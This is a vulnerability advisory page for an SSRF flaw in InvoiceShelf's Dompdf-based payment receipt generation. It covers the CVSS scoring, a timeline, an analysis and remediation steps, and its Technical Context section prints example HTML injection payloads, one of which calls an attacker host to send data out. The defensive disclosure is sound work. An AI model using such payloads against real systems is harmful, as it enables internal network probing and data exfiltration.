Skip to main content

Invoiceshelf CVE-2026-34366

| EUVDEUVD-2026-17616 HIGH
Server-Side Request Forgery (SSRF) (CWE-918)
2026-03-31 GitHub_M
7.6
CVSS 3.1 · GitHub Advisory
Share

Severity by source

GitHub Advisory PRIMARY
7.6 HIGH
AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:L/A:N

Primary rating from GitHub Advisory · only source for this CVE.

CVSS VectorGitHub Advisory

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:L/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
High
User Interaction
None
Scope
Changed
Confidentiality
High
Integrity
Low
Availability
None

Lifecycle Timeline

6
Analysis Updated
Apr 16, 2026 - 06:10 EUVD-patch-fix
executive_summary
Re-analysis Queued
Apr 16, 2026 - 05:29 backfill_euvd_patch
patch_released
Patch available
Apr 16, 2026 - 05:29 EUVD
2.2.0
EUVD ID Assigned
Mar 31, 2026 - 20:31 euvd
EUVD-2026-17616
Analysis Generated
Mar 31, 2026 - 20:31 vuln.today
CVE Published
Mar 31, 2026 - 20:05 nvd
HIGH 7.6

DescriptionGitHub Advisory

InvoiceShelf is an open-source web & mobile app that helps track expenses, payments and create professional invoices and estimates. Prior to version 2.2.0, a Server-Side Request Forgery (SSRF) vulnerability exists in the Payment receipt PDF generation module. User-supplied HTML in the payment Notes field is passed unsanitised to the Dompdf rendering library, which will fetch any remote resources referenced in the markup. The vulnerability is exploitable directly via the PDF receipt endpoint, regardless of whether automated email attachments are enabled. This issue has been patched in version 2.2.0.

AnalysisAI

Server-Side Request Forgery in InvoiceShelf's PDF payment receipt generation allows authenticated high-privilege users to make arbitrary HTTP requests from the server through unsanitized HTML injection in payment Notes fields. The vulnerability affects InvoiceShelf versions prior to 2.2.0, leveraging the Dompdf library's resource fetching behavior to pivot attacks against internal network resources or exfiltrate data via DNS/HTTP channels. CVSS 7.6 reflects network-accessible attack with low complexity but high privileges required and cross-scope impact. No public exploit identified at time of analysis, with EPSS data unavailable for this recent CVE. Vendor-released patch available in version 2.2.0 per GitHub security advisory.

Technical ContextAI

InvoiceShelf is an open-source invoicing and expense tracking application (identified by CPE cpe:2.3:a:invoiceshelf:invoiceshelf). The vulnerability stems from CWE-918 (Server-Side Request Forgery) in the payment receipt PDF generation workflow. User-controlled HTML content entered into payment Notes fields is passed without sanitization to the Dompdf PHP library, which is designed to convert HTML/CSS to PDF. Dompdf's default configuration allows fetching external resources (images, stylesheets, fonts) referenced via URLs in the HTML markup. Attackers can inject malicious HTML tags like <img src='http://internal-server/admin'> or <link href='http://attacker.com/?data=X'> to force the server to initiate HTTP requests to arbitrary destinations. The CVSS scope change (S:C) indicates the vulnerable component (Dompdf rendering context) can impact resources beyond its security boundary, enabling attacks against internal services not directly exposed to the attacker. The vulnerability is directly exploitable through the PDF receipt generation endpoint, independent of email automation features, suggesting multiple code paths trigger the unsafe rendering.

RemediationAI

Upgrade to InvoiceShelf version 2.2.0 immediately, which includes patches addressing the unsafe HTML handling in PDF generation. The fixed release is available at https://github.com/InvoiceShelf/InvoiceShelf/releases/tag/2.2.0. Organizations unable to upgrade immediately should implement compensating controls: restrict payment Notes field input to plaintext only through application-layer validation, deploy network egress filtering to prevent the InvoiceShelf server from initiating outbound HTTP/HTTPS connections to untrusted destinations, audit high-privilege user accounts with payment management permissions for signs of compromise, and monitor server-side HTTP request logs for unusual internal network scanning or external callback patterns. For containerized deployments, apply network policies limiting pod egress to necessary services only. Review Dompdf configuration to disable remote resource loading if the library version supports this option, though upgrading InvoiceShelf remains the primary remediation path.

Share

CVE-2026-34366 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy